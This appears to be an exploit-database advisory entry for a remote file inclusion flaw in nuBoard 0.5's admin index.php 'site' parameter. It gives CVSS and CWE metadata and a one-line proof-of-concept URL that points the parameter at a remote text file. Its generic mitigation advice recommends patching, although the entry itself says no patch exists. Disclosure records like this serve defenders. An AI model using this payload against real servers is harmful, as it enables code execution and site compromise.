header-logo
Suggest Exploit
vendor:
nuBoard
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: nuBoard
Affected Version From: 0.5
Affected Version To: 0.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

nuBoard 0.5 (index.php site) Remote File Inclusion Vulnerability

This vulnerability allows remote attackers to include arbitrary files via a URL in the site parameter of the index.php script.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update to a version that includes a fix for this issue.
Source

Exploit-DB raw data:

nuBoard 0.5 (index.php site) Remote File Inclusion Vulnerability
 http://switch.dl.sourceforge.net/sourceforge/nuboard/nuboard_v0.5.tar.gz
 /nuboard_v0.5/admin/index.php?site=http://localhost/scripts/020.txt?

# milw0rm.com [2007-11-04]